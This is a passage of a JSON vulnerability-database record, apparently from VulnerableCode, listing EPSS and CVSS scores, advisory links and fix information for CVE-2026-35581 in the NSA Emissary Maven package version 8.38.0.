"scoring_system": "epss", "scoring_elements": "0.18398", 
"published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18402", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18451", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00077", "scoring_system": "epss", "scoring_elements": "0.22992", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00077", "scoring_system": "epss", "scoring_elements": "0.23005", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24965", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24993", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24802", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24727", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24892", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24848", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00087", "scoring_system": "epss", "scoring_elements": "0.24903", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26218", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26192", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26118", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00095", "scoring_system": "epss", "scoring_elements": "0.26136", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35581" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", 
"reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1290", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1290" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-08T14:57:38Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35581", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35581" }, { "reference_url": "https://github.com/advisories/GHSA-6c37-7w4p-jg9v", "reference_id": "GHSA-6c37-7w4p-jg9v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", 
"scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6c37-7w4p-jg9v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35581", "GHSA-6c37-7w4p-jg9v" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vst1-rzvp-9bec" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.38.0" }